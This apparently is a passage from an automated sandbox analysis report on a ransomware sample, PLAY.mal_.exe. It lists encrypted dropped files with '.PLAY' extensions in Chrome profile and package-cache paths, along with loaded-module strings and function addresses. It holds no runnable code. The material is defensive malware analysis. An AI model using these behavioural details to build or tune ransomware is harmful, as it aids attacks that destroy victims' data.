        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\9aac68df8d0c7a90_0 entropy: 7.9966570813Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js entropy: 7.99966238658Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_metadata\verified_contents.json entropy: 7.99088819373Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js entropy: 7.99934838305Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif entropy: 7.99723232037Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.005.etl entropy: 7.99115870016Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fc9785cdcbaea0b7_0 entropy: 7.99854856742Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: A:\Recovery\WindowsRE\boot.sdi.PLAY (copy) entropy: 7.99994281938Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateUx_Temp.1.etl.PLAY (copy) entropy: 7.99535932735Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.001.etl.PLAY (copy) entropy: 7.99332668999Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.004.etl.PLAY (copy) entropy: 7.99231889317Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.009.etl.PLAY (copy) entropy: 7.99064060505Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.002.etl.PLAY (copy) entropy: 7.99436517777Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.005.etl.PLAY (copy) entropy: 7.99115870016Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\vcRuntimeMinimum_x86\cab1.cab.PLAY (copy) entropy: 7.99988789096Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\cab1.cab.PLAY (copy) entropy: 7.99978805821Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab.PLAY (copy) entropy: 7.99988212784Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\cab1.cab.PLAY (copy) entropy: 7.99981866052Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\cab1.cab.PLAY (copy) entropy: 7.99982593479Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\cab1.cab.PLAY (copy) entropy: 7.99996026328Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\cab1.cab.PLAY (copy) entropy: 7.99996505694Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\vcRuntimeAdditional_x86\cab1.cab.PLAY (copy) entropy: 7.99996778285Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\cab1.cab.PLAY (copy) entropy: 7.99854582847Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab.PLAY (copy) entropy: 7.99840138716Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab.PLAY (copy) entropy: 7.99819227613Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies.PLAY (copy) entropy: 7.99055398413Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\eventpage_bin_prod.js.PLAY (copy) entropy: 7.99755154683Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_metadata\verified_contents.json.PLAY (copy) entropy: 7.99088819373Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.PLAY (copy) entropy: 7.99966238658Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.PLAY (copy) entropy: 7.99934838305Jump to dropped file
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.PLAY (copy) entropy: 7.99723232037Jump to dropped file
        Source: PLAY.mal_.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: PLAY.mal_.exe, 00000000.00000003.392933278.00000000031B2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcrt.dllj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.399573219.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp_win.dllj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.400002647.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser32j% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.380967509.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNETUTILS.DLLj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.380261953.0000000003216000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.398164138.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHLWAPI.DLLj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.402719687.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameimm32j% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.393364039.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMBASE.DLLj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.382779971.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: LInternalNameOriginalFileNameProductNameProductVersionCompanyNameLegalCopyrightLegalTrademarksPlatform vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.382779971.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHELL32.DLLj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.381337074.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerpcrt4.dllj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.380378382.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.398338084.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegdi32j% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.393091382.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHCORE.dllj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.394554162.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWindows.Storage.dllj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.381918022.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameiphlpapi.dllj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.381571826.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebcryptprimitives.dllj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.382187348.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamews2_32.dllj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.402395094.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePOWRPROF.DLLj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.397854199.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameadvapi32.dllj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.402907884.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamempr.dllj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.380946454.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebcrypt.dllj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.402283247.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePROFAPI.DLLj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.402134952.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWin32u.DLLj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.402653498.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefilterLib.dllj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.381665426.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesechost.dllj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.381294989.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSRVCLI.DLLj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.392986515.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCFGMGR32.DLLj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.381007395.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.398793778.000000000317B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegdi32j% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.380476408.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: NSC_NameNSC_AddressNSC_PhoneNSC_EmailNSC_DescriptionWM/WriterWM/ConductorWM/ProducerWM/DirectorWM/ContentGroupDescriptionWM/SubTitleWM/PartOfSetWM/ProtectionTypeWM/VideoHeightWM/VideoWidthWM/VideoFrameRateWM/MediaClassPrimaryIDWM/MediaClassSecondaryIDWM/PeriodWM/CategoryWM/PictureWM/Lyrics_SynchronisedWM/OriginalLyricistWM/OriginalArtistWM/OriginalAlbumTitleWM/OriginalReleaseYearWM/OriginalFilenameWM/PublisherWM/EncodedByWM/EncodingSettingsWM/EncodingTimeWM/AuthorURLWM/UserWebURLWM/AudioFileURLWM/AudioSourceURLWM/LanguageWM/ParentalRatingWM/BeatsPerMinuteWM/InitialKeyWM/MoodWM/TextWM/DVDIDWM/WMContentIDWM/WMCollectionIDWM/WMCollectionGroupIDWM/UniqueFileIdentifierWM/ModifiedByWM/RadioStationNameWM/RadioStationOwnerWM/PlaylistDelayWM/CodecWM/DRMWM/ISRCWM/ProviderWM/ProviderRatingWM/ProviderStyleWM/ContentDistributorWM/SubscriptionContentIDWM/WMADRCPeakReferenceWM/WMADRCPeakTargetWM/WMADRCAverageReferenceWM/WMADRCAverageTargetWM/StreamTypeInfoWM/PeakBitrateWM/ASFPacketCountWM/ASFSecurityObjectsSizeWM/SharedUserRatingWM/SubTitleDescriptionWM/MediaCreditsWM/ParentalRatingReasonWM/OriginalReleaseTimeWM/MediaStationCallSignWM/MediaStationNameWM/MediaNetworkAffiliationWM/MediaOriginalChannelWM/MediaIsStereoWM/MediaOriginalBroadcastDateTimeWM/VideoClosedCaptioningWM/MediaIsRepeatWM/MediaIsLiveWM/MediaIsTapeWM/MediaIsDelayWM/MediaIsSubtitledWM/MediaIsPremiereWM/MediaIsFinaleWM/MediaIsSAPWM/ProviderCopyrightWM/ISANWM/ADIDWM/WMShadowFileSourceFileTypeWM/WMShadowFileSourceDRMTypeWM/WMCPDistributorWM/WMCPDistributorIDWM/SeasonNumberWM/EpisodeNumberEarlyDataDeliveryJustInTimeDecodeSingleOutputBufferSoftwareScalingDeliverOnReceiveScrambledAudioDedicatedDeliveryThreadEnableDiscreteOutputSpeakerConfigDynamicRangeControlAllowInterlacedOutputVideoSampleDurationsStreamLanguageEnableWMAProSPDIFOutputDeinterlaceModeInterlacedCodingInitialPatternForInverseTelecineJPEGCompressionQualityWatermarkCLSIDWatermarkConfigFixedFrameRate_SOURCEFORMATTAG_ORIGINALWAVEFORMAT_EDL_COMPLEXITYEX_DECODERCOMPLEXITYPROFILEReloadIndexOnSeekStreamNumIndexObjectsFailSeekOnErrorPermitSeeksBeyondEndOfStreamUsePacketAtSeekPointSourceBufferTimeSourceMaxBytesAtOnce_VBRENABLED_VBRQUALITY_RMAX_BMAXVBR PeakBuffer Average_COMPLEXITYEXMAX_COMPLEXITYEXOFFLINE_COMPLEXITYEXLIVE_ISVBRSUPPORTED_PASSESUSEDMusicSpeechClassModeMusicClassModeSpeechClassModeMixedClassModeSpeechFormatCapPeakValueAverageLevelFold6To2Channels3Fold%luTo%luChannels%luDeviceConformanceTemplateEnableFrameInterpolationNeedsPreviousSampleWM/IsCompilation| vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.380476408.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKernelbase.dllj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.402226498.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel.appcore.dllj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.381518459.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesecurity.dllj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.380856909.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -%system32%%systemroot%\system32%sysnative%%windir%%programfilesnative%%systemdrive%\Program FilesCommonFilesDirCommonProgramFilesCommonFilesDir (x86)CommonProgramFiles(x86)ProgramFilesDirProgramFilesProgramFilesDir (x86)ProgramFiles(x86)ProgramDataPublicWIN16WIN32DOSUNKNOWNProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright\StringFileInfo\000004B0\\StringFileInfo\000004E4\\StringFileInfo\040904B0\\StringFileInfo\040904E4\__PROCESS_HISTORYDATABASELIBRARYINEXCLUDESHIMPATCHAPPEXEEXE_TYPEMATCHING_FILESHIM_REFPATCH_REFLAYERFILEAPPHELPLINKDATAMSI_TRANSFORMMSI_TRANSFORM_REFMSI_PACKAGEFLAGCONTEXTMSI_CUSTOM_ACTIONFLAG_REFCONTEXT_REFACTIONLOOKUPNAMEDESCRIPTIONMODULEAPIVENDORAPP_NAMECOMMAND_LINEDLLFILEWILDCARD_NAMEAPPHELP_DETAILSLINK_URLLINK_TEXTAPPHELP_TITLEAPPHELP_CONTACTSXS_MANIFESTDATA_STRINGMSI_TRANSFORM_FILELAYER_DISPLAYNAMECOMPILER_VERSIONACTION_TYPESTRINGTABLEOFFSETSHIM_TAGIDPATCH_TAGIDPREVOSMAJORVERPREVOSMINORVERPREVOSPLATFORMIDPREVOSBUILDNOPROBLEMSEVERITYLANGIDENGINEHTMLHELPIDINDEX_FLAGSFLAGSDATA_VALUETYPEDATA_DWORDLAYER_TAGIDMSI_TRANSFORM_TAGIDFROM_LINK_DATEUPTO_LINK_DATEFLAG_TAGIDCONTEXT_TAGIDRUNTIME_PLATFORMGUEST_TARGET_PLATFORMURLURL_IDAPP_NAME_RC_IDVENDOR_NAME_RC_IDSUMMARY_MSG_RC_IDDESCRIPTION_RC_IDPARAMETER1_RC_IDTAGIDSTRINGTABLE_ITEMINCLUDEGENERALMATCH_LOGIC_NOTAPPLY_ALL_SHIMSUSE_SERVICE_PACK_FILESMITIGATION_OSMONITORING_OFFTELEMETRY_OFFRAC_EVENT_OFFSHIM_ENGINE_OFFLAYER_PROPAGATION_OFFBLOCK_UPGRADEBLOCK_UPGRADE_TYPEREINSTALL_UPGRADEREINSTALL_UPGRADE_TYPEINCLUDEEXCLUDEDLLTIMEMODTIMEFLAG_MASK_KERNELFROM_BIN_PRODUCT_VERSIONUPTO_BIN_PRODUCT_VERSIONDATA_QWORDFLAG_MASK_USERFLAGS_NTVDM1FLAGS_NTVDM2FLAGS_NTVDM3FLAG_MASK_SHELLFLAG_MASK_WINRTFROM_BIN_FILE_VERSIONUPTO_BIN_FILE_VERSIONFLAG_MASK_FUSIONFLAG_PROCESSPARAMFLAG_LUAFLAG_INSTALLPATCH_BITSFILE_BITSEXE_IDDATA_BITSMSI_PACKAGE_IDDATABASE_IDINDEX_BITSINDEXESINDEXMATCH_MODETAGINDEX_TAGINDEX_KEYCONTEXT_PLATFORM_IDCONTEXT_BRANCH_IDFIX_IDAPP_IDKDEVICEKDRIVERMATCHING_DEVICEACPIBIOSCPUOEMKFLAGKFLAG_REFKDATAKSHIMKSHIM_REFVENDOR_IDDEVICE_IDSUB_VENDOR_IDSUB_SYSTEM_IDREVISION_EQREVISION_LEREVISION_GEDATE_EQDATE_LEDATE_GECPU_MODEL_EQCPU_MODEL_LECPU_MODEL_GECPU_FAMILY_EQCPU_FAMILY_LECPU_FAMILY_GECREATOR_REVISION_EQCREATOR_REVISION_LECREATOR_REVISION_GEFORCE_CACHETRACE_PCAPACKAGEID_NAMEPACKAGEID_PUBLISHERPACKAGEID_ARCHITECTUREPACKAGEID_LANGUAGEPACKAGEID_VERSIONFROM_PACKAGEID_VERSIONUPTO_PACKAGEID_VERSIONOSMAXVERSIONTESTEDFROM_OSMAXVERSIONTESTEDUPTO_OSMAXVERSIONTESTEDROUTING_MODEOS_VERSION_VALUEQUIRKQUIRK_TAGIDQUIRK_REFQUIRK_ENABLED_VERSION_LTQUIRK_COMPONENT_CODE_IDQUIRK_CODE_IDQUIRK_OFFELEVATED_PROP_OFFMIGRATION_DATAMIGRATION_DATA_TYPEMIGRATION_DATA_REFMIGRATION_DATA_TEXTMIGRATION_DATA_TAGIDBIOS_BLOCKMATCHING_INFO_BLOCKDEVICE_BLOCKUPGRADE_DRIVER_BLOCKMANUFACTURERMODELDATEUPGRADE_DATAMATCHING_REGREG_VALUE_NAMEREG_VALUE_TYPEREG_VALUE_DATA_SZREG_VALUE_DATA_DWORDREG_VALUE_DATA_QWORDREG_VALUE_DATA_BINARYMATCHING_TEXTTEXTTEXT_ENCODINGMACHINE_BLOCKSHIM_CLASSOS_UPGRADEPACKAGEE
        Source: PLAY.mal_.exe, 00000000.00000003.380856909.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameApphelpj% vs PLAY.mal_.exe
        Source: PLAY.mal_.exe, 00000000.00000003.381549375.0000000003100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecryptbase.dllj% vs PLAY.mal_.exe
        Source: C:\Users\user\Desktop\PLAY.mal_.exeSection loaded: ext-ms-win-gdi-desktop-l1-1-0.dllJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AF51D00_2_00AF51D0
        Source: C:\Users\user\Desktop\PLAY.mal_.exeCode function: 0_2_00AE4A810_2_00AE4A81
